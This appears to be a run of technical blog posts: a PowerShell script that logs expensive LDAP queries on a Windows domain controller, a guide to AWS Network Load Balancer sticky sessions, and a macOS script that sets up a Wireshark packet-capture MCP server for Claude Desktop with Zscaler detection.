browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.

Windows Domain Controller: Monitoring and Logging LDAP Query Resource Usage

The script below monitors LDAP operations on a Domain Controller and logs detailed information about queries that exceed specified thresholds for execution time, CPU usage, or results returned. It helps identify problematic LDAP queries that may be impacting domain controller performance.

Parameter: ThresholdSeconds
Minimum query duration in seconds to log (default: 5)

Parameter: LogPath
Path where log files will be saved (default: C:\LDAPDiagnostics)

Parameter: MonitorDuration
How long to monitor in minutes (default: continuous)

EXAMPLE
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -LogPath "C:\Logs\LDAP"

[CmdletBinding()]
param(
[int]$ThresholdSeconds = 5,
[string]$LogPath = "C:\LDAPDiagnostics",
[int]$MonitorDuration = 0  # 0 = continuous
)
# Requires Administrator privileges
#Requires -RunAsAdministrator
# Create log directory if it doesn't exist
if (-not (Test-Path $LogPath)) {
New-Item -ItemType Directory -Path $LogPath -Force | Out-Null
}
$logFile = Join-Path $LogPath "LDAP_Diagnostics_$(Get-Date -Format 'yyyyMMdd_HHmmss').log"
$csvFile = Join-Path $LogPath "LDAP_Queries_$(Get-Date -Format 'yyyyMMdd_HHmmss').csv"
function Write-Log {
param([string]$Message, [string]$Level = "INFO")
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
$logMessage = "[$timestamp] [$Level] $Message"
Write-Host $logMessage
Add-Content -Path $logFile -Value $logMessage
}
function Get-LDAPStatistics {
try {
# Query NTDS performance counters for LDAP statistics
$ldapStats = @{
ActiveThreads = (Get-Counter '\NTDS\LDAP Active Threads' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
SearchesPerSec = (Get-Counter '\NTDS\LDAP Searches/sec' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
ClientSessions = (Get-Counter '\NTDS\LDAP Client Sessions' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
BindTime = (Get-Counter '\NTDS\LDAP Bind Time' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
}
return $ldapStats
}
catch {
Write-Log "Error getting LDAP statistics: $_" "ERROR"
return $null
}
}
function Parse-LDAPEvent {
param($Event)
$eventData = @{
TimeCreated = $Event.TimeCreated
ClientIP = $null
ClientPort = $null
StartingNode = $null
Filter = $null
SearchScope = $null
AttributeSelection = $null
ServerControls = $null
VisitedEntries = $null
ReturnedEntries = $null
TimeInServer = $null
}
# Parse event XML for detailed information
try {
$xml = [xml]$Event.ToXml()
$dataNodes = $xml.Event.EventData.Data
foreach ($node in $dataNodes) {
switch ($node.Name) {
"Client" { $eventData.ClientIP = ($node.'#text' -split ':')[0] }
"StartingNode" { $eventData.StartingNode = $node.'#text' }
"Filter" { $eventData.Filter = $node.'#text' }
"SearchScope" { $eventData.SearchScope = $node.'#text' }
"AttributeSelection" { $eventData.AttributeSelection = $node.'#text' }
"ServerControls" { $eventData.ServerControls = $node.'#text' }
"VisitedEntries" { $eventData.VisitedEntries = $node.'#text' }
"ReturnedEntries" { $eventData.ReturnedEntries = $node.'#text' }
"TimeInServer" { $eventData.TimeInServer = $node.'#text' }
}
}
}
catch {
Write-Log "Error parsing event XML: $_" "WARNING"
}
return $eventData
}
Write-Log "=== LDAP Query Diagnostics Started ===" "INFO"
Write-Log "Threshold: $ThresholdSeconds seconds" "INFO"
Write-Log "Log Path: $LogPath" "INFO"
Write-Log "Monitor Duration: $(if($MonitorDuration -eq 0){'Continuous'}else{"$MonitorDuration minutes"})" "INFO"
# Enable Field Engineering logging if not already enabled
Write-Log "Checking Field Engineering diagnostic logging settings..." "INFO"
try {
$regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics"
$currentValue = Get-ItemProperty -Path $regPath -Name "15 Field Engineering" -ErrorAction SilentlyContinue
if ($currentValue.'15 Field Engineering' -lt 5) {
Write-Log "Enabling Field Engineering logging (level 5)..." "INFO"
Set-ItemProperty -Path $regPath -Name "15 Field Engineering" -Value 5
Write-Log "Field Engineering logging enabled. You may need to restart NTDS service for full effect." "WARNING"
}
else {
Write-Log "Field Engineering logging already enabled at level $($currentValue.'15 Field Engineering')" "INFO"
}
}
catch {
Write-Log "Error configuring diagnostic logging: $_" "ERROR"
}
# Create CSV header
$csvHeader = "TimeCreated,ClientIP,StartingNode,Filter,SearchScope,AttributeSelection,VisitedEntries,ReturnedEntries,TimeInServer,ServerControls"
Set-Content -Path $csvFile -Value $csvHeader
Write-Log "Monitoring for expensive LDAP queries (threshold: $ThresholdSeconds seconds)..." "INFO"
Write-Log "Press Ctrl+C to stop monitoring" "INFO"
$startTime = Get-Date
$queriesLogged = 0
try {
while ($true) {
# Check if monitoring duration exceeded
if ($MonitorDuration -gt 0) {
$elapsed = (Get-Date) - $startTime
if ($elapsed.TotalMinutes -ge $MonitorDuration) {
Write-Log "Monitoring duration reached. Stopping." "INFO"
break
}
}
# Get current LDAP statistics
$stats = Get-LDAPStatistics
if ($stats) {
Write-Verbose "Active Threads: $($stats.ActiveThreads), Searches/sec: $($stats.SearchesPerSec), Client Sessions: $($stats.ClientSessions)"
}
# Query Directory Service event log for expensive LDAP queries
# Event ID 1644 = expensive search operations
$events = Get-WinEvent -FilterHashtable @{
LogName = 'Directory Service'
Id = 1644
StartTime = (Get-Date).AddSeconds(-10)
} -ErrorAction SilentlyContinue
foreach ($event in $events) {
$eventData = Parse-LDAPEvent -Event $event
# Convert time in server from milliseconds to seconds
$timeInSeconds = if ($eventData.TimeInServer) { 
[int]$eventData.TimeInServer / 1000 
} else { 
0 
}
if ($timeInSeconds -ge $ThresholdSeconds) {
$queriesLogged++
Write-Log "=== Expensive LDAP Query Detected ===" "WARNING"
Write-Log "Time: $($eventData.TimeCreated)" "WARNING"
Write-Log "Client IP: $($eventData.ClientIP)" "WARNING"
Write-Log "Duration: $timeInSeconds seconds" "WARNING"
Write-Log "Starting Node: $($eventData.StartingNode)" "WARNING"
Write-Log "Filter: $($eventData.Filter)" "WARNING"
Write-Log "Search Scope: $($eventData.SearchScope)" "WARNING"
Write-Log "Visited Entries: $($eventData.VisitedEntries)" "WARNING"
Write-Log "Returned Entries: $($eventData.ReturnedEntries)" "WARNING"
Write-Log "Attributes: $($eventData.AttributeSelection)" "WARNING"
Write-Log "Server Controls: $($eventData.ServerControls)" "WARNING"
Write-Log "======================================" "WARNING"
# Write to CSV (quote fields that may contain commas, such as DNs and filters)
$csvLine = "$($eventData.TimeCreated),$($eventData.ClientIP),`"$($eventData.StartingNode)`",`"$($eventData.Filter)`",$($eventData.SearchScope),`"$($eventData.AttributeSelection)`",$($eventData.VisitedEntries),$($eventData.ReturnedEntries),$($eventData.TimeInServer),`"$($eventData.ServerControls)`""
Add-Content -Path $csvFile -Value $csvLine
}
}
Start-Sleep -Seconds 5
}
}
catch {
Write-Log "Error during monitoring: $_" "ERROR"
}
finally {
Write-Log "=== LDAP Query Diagnostics Stopped ===" "INFO"
Write-Log "Total expensive queries logged: $queriesLogged" "INFO"
Write-Log "Log file: $logFile" "INFO"
Write-Log "CSV file: $csvFile" "INFO"
}
```
## Usage Examples
### Basic Usage (Continuous Monitoring)
Run with default settings - monitors queries taking 5+ seconds:
```powershell
.\Diagnose-LDAPQueries.ps1
```
### Custom Threshold and Duration
Monitor for 30 minutes, logging queries that take 3+ seconds:
```powershell
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -MonitorDuration 30
```
### Custom Log Location
Save logs to a specific directory:
```powershell
.\Diagnose-LDAPQueries.ps1 -LogPath "D:\Logs\LDAP"
```
### Verbose Output
See real-time LDAP statistics while monitoring:
```powershell
.\Diagnose-LDAPQueries.ps1 -Verbose
```
## Requirements
- **Administrator privileges** on the domain controller
- **Windows Server** with Active Directory Domain Services role
- **PowerShell 5.1 or later**
## Understanding the Output
### Log File Example
```
[2025-01-15 14:23:45] [WARNING] === Expensive LDAP Query Detected ===
[2025-01-15 14:23:45] [WARNING] Time: 01/15/2025 14:23:43
[2025-01-15 14:23:45] [WARNING] Client IP: 192.168.1.50
[2025-01-15 14:23:45] [WARNING] Duration: 8.5 seconds
[2025-01-15 14:23:45] [WARNING] Starting Node: DC=contoso,DC=com
[2025-01-15 14:23:45] [WARNING] Filter: (&(objectClass=user)(memberOf=*))
[2025-01-15 14:23:45] [WARNING] Search Scope: 2
[2025-01-15 14:23:45] [WARNING] Visited Entries: 45000
[2025-01-15 14:23:45] [WARNING] Returned Entries: 12000
```
### What to Look For
- **High visited/returned ratio** - Indicates an inefficient filter
- **Subtree searches from root** - Often unnecessarily broad
- **Wildcard filters** - Like `(cn=*)` can be very expensive
- **Unindexed attributes** - Queries on non-indexed attributes visit many entries
- **Repeated queries** - Same client making the same expensive query repeatedly
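To act on the visited/returned ratio quickly, you can pull it straight out of the CSV the script writes. The sample rows below are made up for illustration; real exports can contain commas inside quoted fields (DNs, filters), so prefer a CSV-aware parser such as PowerShell's `Import-Csv` for production data.

```bash
# Create a tiny sample in the same column layout as the script's CSV
cat > /tmp/ldap_queries.csv << 'CSV'
TimeCreated,ClientIP,StartingNode,Filter,SearchScope,AttributeSelection,VisitedEntries,ReturnedEntries,TimeInServer,ServerControls
2025-01-15T14:23:43,192.168.1.50,DC=contoso,(memberOf=*),2,cn,45000,90,8500,none
2025-01-15T14:25:10,192.168.1.51,DC=contoso,(sAMAccountName=jdoe),2,cn,3,1,12,none
CSV
# Print client, visited/returned ratio, and filter; a high ratio means the
# DC walked far more entries than it returned (an inefficient filter)
awk -F',' 'NR>1 && $8>0 { printf "%s ratio=%.1f filter=%s\n", $2, $7/$8, $4 }' /tmp/ldap_queries.csv
```

In this sample the wildcard `(memberOf=*)` query visits 500 entries for every one it returns, which is exactly the pattern worth chasing down.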
## Troubleshooting Common Issues
### No Events Appearing
If you're not seeing Event ID 1644, you may need to lower the search time threshold on the domain controller (on Windows Server 2012 and later it is exposed in the registry):
```powershell
# Lower the Search Time Threshold that triggers Event ID 1644 to 1000ms (1 second)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" `
    -Name "Search Time Threshold (msecs)" -Value 1000
```
### Script Requires Restart
After enabling Field Engineering logging, you may need to restart the NTDS service:
```powershell
Restart-Service NTDS -Force
```

Best Practices

1. **Run during peak hours** to capture real-world problematic queries
2. **Start with a lower threshold** (2-3 seconds) to catch more queries
3. **Analyze the CSV** in Excel or Power BI for patterns
4. **Correlate with client IPs** to identify problematic applications
5. **Work with application owners** to optimize queries with indexes or better filters

Once you’ve identified expensive queries:

1. **Add indexes** for frequently searched attributes
2. **Optimize LDAP filters** to be more specific
3. **Reduce search scope** where possible
4. **Implement paging** for large result sets
5. **Cache results** on the client side when appropriate
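From the client side, several of these fixes can be combined in a single query. This sketch uses OpenLDAP's `ldapsearch`; the host and base DN are placeholders for your environment:

```bash
# Specific indexed filter, scope narrowed to one OU, and paged results
# (500 entries per page) via the simple paged results control (-E pr=...)
ldapsearch -H ldap://dc01.contoso.com \
  -b "OU=Sales,DC=contoso,DC=com" -s sub \
  -E pr=500/noprompt \
  "(sAMAccountName=jdoe)" cn mail
```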

This script has helped me identify numerous performance bottlenecks in production environments. I hope it helps you optimize your Active Directory infrastructure as well!

Deep Dive: AWS NLB Sticky Sessions (stickiness) Setup, Behavior, and Hidden Pitfalls

When you deploy applications behind a Network Load Balancer (NLB) in AWS, you usually expect perfect traffic distribution: fast, fair, and stateless.
But what if your backend holds stateful sessions, like in-memory login sessions, caches, or WebSocket connections, and you need a given client to keep hitting the same target every time?

That's where NLB sticky sessions (also called connection stickiness or source IP affinity) come in. They're powerful but widely misunderstood, and misconfiguring them can lead to uneven load, dropped connections, or mysterious client "resets."

Let’s break down exactly how they work, how to set them up, what to watch for, and how to troubleshoot the tricky edge cases that appear in production.


1. What Are Sticky Sessions on an NLB?

At a high level, sticky sessions ensure that traffic from the same client consistently lands on the same target (EC2 instance, IP, or container) behind your NLB.

Unlike the Application Load Balancer (ALB), which uses HTTP cookies for stickiness, the NLB operates at Layer 4 (TCP/UDP).
That means it doesn't look inside your packets. Instead, it bases stickiness on network-level parameters like:

  • Source IP address
  • Destination IP and port
  • Source port (sometimes included in the hash)
  • Protocol (TCP, UDP, or TLS passthrough)

AWS refers to this as “source IP affinity.”
When enabled, the NLB creates a flow-hash mapping that ties the client to a backend target.
As long as the hash remains the same, the same client gets routed to the same target — even across multiple connections.


2. Enabling Sticky Sessions on an AWS NLB

Stickiness is configured per target group, not at the NLB level.

Step-by-Step via AWS Console

  1. Go to EC2 → Load Balancers → Target Groups and find the target group your NLB listener uses.
  2. Select the Target Group → Attributes tab.
  3. Under Attributes, set:
  • Stickiness.enabled = true
  • Stickiness.type = source_ip
  4. Save changes and confirm the attributes are updated.

Step-by-Step via AWS CLI

```bash
aws elbv2 modify-target-group-attributes \
  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123 \
  --attributes Key=stickiness.enabled,Value=true Key=stickiness.type,Value=source_ip
```

How to Verify:

```bash
aws elbv2 describe-target-group-attributes \
  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123
```

Sample Output:

```json
{
  "Attributes": [
    { "Key": "stickiness.enabled", "Value": "true" },
    { "Key": "stickiness.type", "Value": "source_ip" }
  ]
}
```

3. How NLB Stickiness Actually Works (Under the Hood)

The NLB’s flow hashing algorithm calculates a hash from several parameters, often the “five-tuple”:

<protocol, source IP, source port, destination IP, destination port>

The hash is used to choose a target. When stickiness is enabled, NLB remembers this mapping for some time (typically a few minutes to hours, depending on flow expiration).

Key Behavior Points:

  • If the same client connects again using the same IP and port, the hash matches, so traffic reaches the same backend target.
  • If any part of that tuple changes (e.g. the client's source port changes), the hash may change, and the client might hit a different target.
  • NLBs maintain this mapping in memory; if the NLB node restarts or fails over, the mapping is lost.
  • Sticky mappings can also be lost when cross-zone load balancing or target health status changes.

Not Cookie Based

Because NLBs don’t inspect HTTP traffic, there’s no cookie involved.
This means:

  • You can’t set session duration or expiry time like in ALB stickiness.
  • Stickiness only works as long as the same network path and source IP persist.

4. Known Limitations & Edge Cases

Sticky sessions on NLBs are helpful but brittle. Here’s what can go wrong:

| Issue | Cause | Effect |
| --- | --- | --- |
| Client source IP changes | NAT, VPN, mobile switching networks | Hash changes → new target |
| Different source port | Client opens multiple sockets or reconnects | Each connection may map differently |
| TLS termination at NLB | NLB terminates TLS | Stickiness not supported (TCP listeners only) |
| Unhealthy target | Health check fails | Mapping breaks; NLB reroutes |
| Cross-zone load balancing toggled | Distribution rules change | May break existing sticky mappings |
| DNS round-robin at client | NLB has multiple IPs per AZ | Client DNS resolver may change NLB node |
| UDP behavior | Stateless packets; different flow hash | Stickiness unreliable for UDP |
| Scaling up/down | New targets added | Hash table rebalanced; some clients remapped |

Tip: If you rely on stickiness, keep your clients stable (same IP) and avoid frequent target registration changes.

5. Troubleshooting Sticky Session Problems

When things go wrong, these are the most common patterns you’ll see:

1. “Stickiness not working”

  • Check target group attributes with `aws elbv2 describe-target-group-attributes --target-group-arn <arn>` and make sure stickiness.enabled is true.
  • Make sure your listener protocol is TCP, not TLS.
  • Confirm that client IPs aren’t being rewritten by NAT or proxy.
  • Check CloudWatch metrics. If one target gets all the traffic, stickiness might be too “sticky” due to limited source IP variety.

2. “Some clients lose session state randomly”

  • Verify client network stability. Mobile clients or corporate proxies can rotate IPs.
  • Confirm health checks aren’t flapping targets.
  • Review your application session design: if session data lives in memory, consider an external session store (Redis, DynamoDB, etc.).

3. “Load imbalance: one instance overloaded”

  • This can happen when many users share one public IP (common in offices or ISPs):
    all those clients hash to the same backend.
  • Mitigate by:
    • Disabling stickiness if not strictly required.
    • Using ALB with cookie based stickiness (more granular).
    • Scaling target capacity.

4. “Connections drop after some time”

  • NLB may remove stale flow mappings.
  • Check TCP keepalive settings on clients and targets. Ensure keepalive_time < NLB idle timeout (350 seconds) to prevent connection resets. Linux commands below:
```bash
# Check keepalive time (seconds before sending first keepalive probe)
sysctl net.ipv4.tcp_keepalive_time
# Check keepalive interval (seconds between probes)
sysctl net.ipv4.tcp_keepalive_intvl
# Check keepalive probes (number of probes before giving up)
sysctl net.ipv4.tcp_keepalive_probes
# View all at once
sysctl -a | grep tcp_keepalive
```
  • Verify idle timeout on backend apps (e.g., web servers closing connections too early).
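The keepalive rule above can be turned into a quick check on a Linux target. The 350-second figure is the NLB idle timeout mentioned in the text; the script only reads procfs, so it degrades gracefully elsewhere.

```bash
# Warn if the first keepalive probe would fire after the NLB idle timeout
NLB_IDLE_TIMEOUT=350
if [ -r /proc/sys/net/ipv4/tcp_keepalive_time ]; then
  ka=$(cat /proc/sys/net/ipv4/tcp_keepalive_time)
  if [ "$ka" -ge "$NLB_IDLE_TIMEOUT" ]; then
    echo "WARN: tcp_keepalive_time=${ka}s >= ${NLB_IDLE_TIMEOUT}s; idle flows may be reset"
  else
    echo "OK: tcp_keepalive_time=${ka}s"
  fi
else
  echo "SKIP: /proc not available (not Linux?)"
fi
```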

6. Observability & Testing

You can validate sticky behavior with:

  • CloudWatch metrics:
    ActiveFlowCount, NewFlowCount, and per target request metrics.
  • VPC Flow Logs: confirm that repeated requests from the same client IP go to the same backend ENI.
  • Packet captures: Use tcpdump or ss on your backend instances to see if the same source IP consistently connects.

Quick test with curl:

```bash
for i in {1..100}; do
  echo "=== Request $i at $(date) ===" | tee -a curl_test.log
  curl http://<nlb-dns-name>/ -v 2>&1 | tee -a curl_test.log
  sleep 0.5
done
```

Run it from the same host and check which backend responds (log hostname on each instance).
Then try from another IP or VPN; you’ll likely see a different target.
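To make "log hostname on each instance" concrete, each target can serve its own hostname. A minimal sketch, assuming `ncat` (shipped with nmap) is installed on the targets and port 8080 is free:

```bash
# Build an HTTP response that identifies this backend by its hostname
body=$(hostname)
response=$(printf 'HTTP/1.1 200 OK\r\nContent-Length: %s\r\nConnection: close\r\n\r\n%s' "${#body}" "$body")
echo "$response"
# To actually serve one request with it (blocks until a client connects):
#   printf '%s' "$response" | ncat -l 8080 --send-only
```

With this in place, the curl loop above tells you immediately which target answered each request.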

7. Best Practices

  1. Only enable stickiness if necessary.
    Stateless applications scale better without it.
  2. If using TLS: terminate TLS at the backend or use ALB if you need session affinity.
  3. Use shared session stores.
    Tools like ElastiCache (Redis) or DynamoDB make scaling simpler and safer.
  4. Avoid toggling cross-zone load balancing while serving traffic; it resets the sticky map.
  5. Set up proper health checks. Unhealthy targets break affinity immediately.
  6. Monitor uneven load. Large NAT’d user groups can overload a single instance.
  7. For UDP consider designing idempotent stateless processing; sticky sessions may not behave reliably.

8. Example Architecture Pattern

Scenario: A multiplayer game server behind an NLB.
Each player connects via TCP to the game backend that stores their in-memory state.

✅ Recommended setup:

  • Enable stickiness.enabled = true and stickiness.type = source_ip
  • Disable TLS termination at NLB
  • Keep targets in the same AZ with cross-zone load balancing disabled to maintain stable mapping
  • Maintain external health and scaling logic to avoid frequent re-registrations

This setup ensures that the same player IP always lands on the same backend server, as long as their network path is stable.
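The recommended attributes can be scripted as well. The ARNs below are placeholders; note that cross-zone load balancing is a load-balancer-level attribute on an NLB, while stickiness lives on the target group:

```bash
# Enable source IP stickiness on the target group
aws elbv2 modify-target-group-attributes \
  --target-group-arn <target-group-arn> \
  --attributes Key=stickiness.enabled,Value=true Key=stickiness.type,Value=source_ip
# Keep cross-zone load balancing disabled for a stable mapping
aws elbv2 modify-load-balancer-attributes \
  --load-balancer-arn <nlb-arn> \
  --attributes Key=load_balancing.cross_zone.enabled,Value=false
```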

9. Summary Table

| Attribute | Supported Value | Notes |
| --- | --- | --- |
| stickiness.enabled | true / false | Enables sticky sessions |
| stickiness.type | source_ip | Only option for NLB |
| Supported Protocols | TCP, UDP (limited) | Not supported for TLS listeners |
| Persistence Duration | Until flow reset | Not configurable |
| Cookie-based Stickiness | ❌ No | Use ALB for cookie-based |
| Best for | Stateful TCP apps | e.g. games, custom protocols |

10. When to Use ALB Instead

If you’re dealing with HTTP/HTTPS applications that manage user sessions via cookies or tokens, you’ll be much happier using an Application Load Balancer.
It offers:

  • Configurable cookie duration
  • Per application stickiness
  • Layer 7 routing and metrics

The NLB should be reserved for high-performance, low-latency, or non-HTTP workloads that need raw TCP/UDP handling.

11. Closing Thoughts

AWS NLB sticky sessions are a great feature, but they’re not magic glue.
They work well when your network topology and client IPs are predictable, and your app genuinely needs flow affinity. However, if your environment involves NATs, mobile networks, or frequent scale-ups, expect surprises.

When in doubt:
1. Keep your app stateless,
2. Let the load balancer do its job, and
3. Use stickiness only as a last resort for legacy or session bound systems.

MacBook: Set up a Wireshark packet capture MCP for Anthropic Claude Desktop

If you're like me, the idea of doing anything twice makes you break out in a cold shiver. For my Claude Desktop, I often need a network pcap (packet capture) to unpack something I'm working on. So the script below installs Wireshark, then the Wireshark MCP, and then configures Claude to use it. I also got it working with Zscaler (note: I just did a process grep; you could also check the utun interface or ports 9000/9400).
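For completeness, here is the port-based alternative check mentioned above. The 9000/9400 ports are the ones noted in the text; treat them as an assumption about your Zscaler deployment rather than a guarantee:

```bash
# Look for listeners on the ports Zscaler's tunnel typically uses
if lsof -nP -iTCP:9000 -iTCP:9400 2>/dev/null | grep -q LISTEN; then
  echo "Zscaler ports detected"
else
  echo "No Zscaler ports detected"
fi
```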

I also added example scripts to verify it's working, and some prompts to help you test in Claude.

cat > ~/setup_wiremcp_simple.sh << 'EOF'
#!/bin/bash
# Simplified WireMCP Setup with Zscaler Support
echo ""
echo "============================================"
echo "   WireMCP Setup with Zscaler Support"
echo "============================================"
echo ""
# Detect Zscaler
echo "[INFO] Detecting Zscaler..."
ZSCALER_DETECTED=false
ZSCALER_INTERFACE=""
# Check for Zscaler process
if pgrep -f "Zscaler" >/dev/null 2>&1; then
ZSCALER_DETECTED=true
echo "[ZSCALER] ✓ Zscaler process is running"
fi
# Find Zscaler tunnel interface
UTUN_INTERFACES=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_INTERFACES; do
IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
if [[ "$IP" == 100.64.* ]]; then
ZSCALER_INTERFACE="$iface"
ZSCALER_DETECTED=true
echo "[ZSCALER] ✓ Zscaler tunnel found: $iface (IP: $IP)"
break
fi
done
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "[ZSCALER] ✓ Zscaler environment confirmed"
else
echo "[INFO] No Zscaler detected - standard network"
fi
echo ""
# Check existing installations
echo "[INFO] Checking installed software..."
if command -v tshark >/dev/null 2>&1; then
echo "[✓] Wireshark/tshark is installed"
else
echo "[!] Wireshark not found - install with: brew install --cask wireshark"
fi
if command -v node >/dev/null 2>&1; then
echo "[✓] Node.js is installed: $(node --version)"
else
echo "[!] Node.js not found - install with: brew install node"
fi
if [[ -d "$HOME/WireMCP" ]]; then
echo "[✓] WireMCP is installed at ~/WireMCP"
else
echo "[!] WireMCP not found"
fi
echo ""
# Configure SSL decryption for Zscaler
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "[INFO] Configuring SSL/TLS decryption..."
SSL_KEYLOG="$HOME/.wireshark-sslkeys.log"
touch "$SSL_KEYLOG"
chmod 600 "$SSL_KEYLOG"
if ! grep -q "SSLKEYLOGFILE" ~/.zshrc 2>/dev/null; then
echo "" >> ~/.zshrc
echo "# Wireshark SSL/TLS decryption for Zscaler" >> ~/.zshrc
echo "export SSLKEYLOGFILE=\"$SSL_KEYLOG\"" >> ~/.zshrc
echo "[✓] Added SSLKEYLOGFILE to ~/.zshrc"
else
echo "[✓] SSLKEYLOGFILE already in ~/.zshrc"
fi
echo "[✓] SSL key log file: $SSL_KEYLOG"
fi
echo ""
# Update WireMCP for Zscaler
if [[ -d "$HOME/WireMCP" ]]; then
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "[INFO] Creating Zscaler-aware wrapper..."
cat > "$HOME/WireMCP/start_zscaler.sh" << 'WRAPPER'
#!/bin/bash
echo "=== WireMCP (Zscaler Mode) ==="
# Set SSL decryption
export SSLKEYLOGFILE="$HOME/.wireshark-sslkeys.log"
# Find Zscaler interface
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
if [[ "$IP" == 100.64.* ]]; then
export CAPTURE_INTERFACE="$iface"
echo "✓ Zscaler tunnel: $iface ($IP)"
echo "✓ All proxied traffic flows through this interface"
break
fi
done
if [[ -z "$CAPTURE_INTERFACE" ]]; then
export CAPTURE_INTERFACE="en0"
echo "! Using default interface: en0"
fi
echo ""
echo "Configuration:"
echo "  SSL Key Log: $SSLKEYLOGFILE"
echo "  Capture Interface: $CAPTURE_INTERFACE"
echo ""
echo "To capture: sudo tshark -i $CAPTURE_INTERFACE -c 10"
echo "==============================="
cd "$(dirname "$0")"
node index.js
WRAPPER
chmod +x "$HOME/WireMCP/start_zscaler.sh"
echo "[✓] Created ~/WireMCP/start_zscaler.sh"
fi
# Create test script
cat > "$HOME/WireMCP/test_zscaler.sh" << 'TEST'
#!/bin/bash
echo "=== Zscaler & WireMCP Test ==="
echo ""
# Check Zscaler process
if pgrep -f "Zscaler" >/dev/null; then
echo "✓ Zscaler is running"
else
echo "✗ Zscaler not running"
fi
# Find tunnel
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
if [[ "$IP" == 100.64.* ]]; then
echo "✓ Zscaler tunnel: $iface ($IP)"
FOUND=true
break
fi
done
[[ "$FOUND" != "true" ]] && echo "✗ No Zscaler tunnel found"
echo ""
# Check SSL keylog
if [[ -f "$HOME/.wireshark-sslkeys.log" ]]; then
SIZE=$(wc -c < "$HOME/.wireshark-sslkeys.log")
echo "✓ SSL key log exists ($SIZE bytes)"
else
echo "✗ SSL key log not found"
fi
echo ""
echo "Network interfaces:"
tshark -D 2>/dev/null | head -5
echo ""
echo "To capture Zscaler traffic:"
echo "  sudo tshark -i ${iface:-en0} -c 10"
TEST
chmod +x "$HOME/WireMCP/test_zscaler.sh"
echo "[✓] Created ~/WireMCP/test_zscaler.sh"
fi
echo ""
# Configure Claude Desktop
CLAUDE_CONFIG="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
if [[ -d "$(dirname "$CLAUDE_CONFIG")" ]]; then
echo "[INFO] Configuring Claude Desktop..."
# Backup existing
if [[ -f "$CLAUDE_CONFIG" ]]; then
BACKUP_FILE="${CLAUDE_CONFIG}.backup.$(date +%Y%m%d_%H%M%S)"
cp "$CLAUDE_CONFIG" "$BACKUP_FILE"
echo "[✓] Backup created: $BACKUP_FILE"
fi
# Check if jq is installed
if ! command -v jq >/dev/null 2>&1; then
echo "[INFO] Installing jq for JSON manipulation..."
brew install jq
fi
# Create temp capture directory
TEMP_CAPTURE_DIR="$HOME/.wiremcp/captures"
mkdir -p "$TEMP_CAPTURE_DIR"
echo "[✓] Capture directory: $TEMP_CAPTURE_DIR"
# Prepare environment variables
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
ENV_JSON=$(jq -n \
--arg ssllog "$HOME/.wireshark-sslkeys.log" \
--arg iface "${ZSCALER_INTERFACE:-en0}" \
--arg capdir "$TEMP_CAPTURE_DIR" \
'{"SSLKEYLOGFILE": $ssllog, "CAPTURE_INTERFACE": $iface, "ZSCALER_MODE": "true", "CAPTURE_DIR": $capdir}')
else
ENV_JSON=$(jq -n \
--arg capdir "$TEMP_CAPTURE_DIR" \
'{"CAPTURE_DIR": $capdir}')
fi
# Add or update wiremcp in config, preserving existing servers
if [[ -f "$CLAUDE_CONFIG" ]] && [[ -s "$CLAUDE_CONFIG" ]]; then
echo "[INFO] Merging WireMCP into existing config..."
jq --arg home "$HOME" \
--argjson env "$ENV_JSON" \
'.mcpServers.wiremcp = {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}' \
"$CLAUDE_CONFIG" > "${CLAUDE_CONFIG}.tmp" && mv "${CLAUDE_CONFIG}.tmp" "$CLAUDE_CONFIG"
else
echo "[INFO] Creating new Claude config..."
jq -n --arg home "$HOME" \
--argjson env "$ENV_JSON" \
'{"mcpServers": {"wiremcp": {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}}}' \
> "$CLAUDE_CONFIG"
fi
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "[✓] Claude configured with Zscaler mode"
else
echo "[✓] Claude configured"
fi
echo "[✓] Existing MCP servers preserved"
fi
echo ""
echo "============================================"
echo "             Summary"
echo "============================================"
echo ""
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
echo "Zscaler Environment:"
echo "  ✓ Detected and configured"
[[ -n "$ZSCALER_INTERFACE" ]] && echo "  ✓ Tunnel interface: $ZSCALER_INTERFACE"
echo "  ✓ SSL decryption ready"
echo ""
echo "Next steps:"
echo "  1. Restart terminal: source ~/.zshrc"
echo "  2. Restart browsers for HTTPS decryption"
else
echo "Standard Network:"
echo "  • No Zscaler detected"
echo "  • Standard configuration applied"
fi
echo ""
echo "For Claude Desktop:"
echo "  1. Restart Claude Desktop app"
echo "  2. Ask Claude to analyze network traffic"
echo ""
echo "============================================"
exit 0
EOF
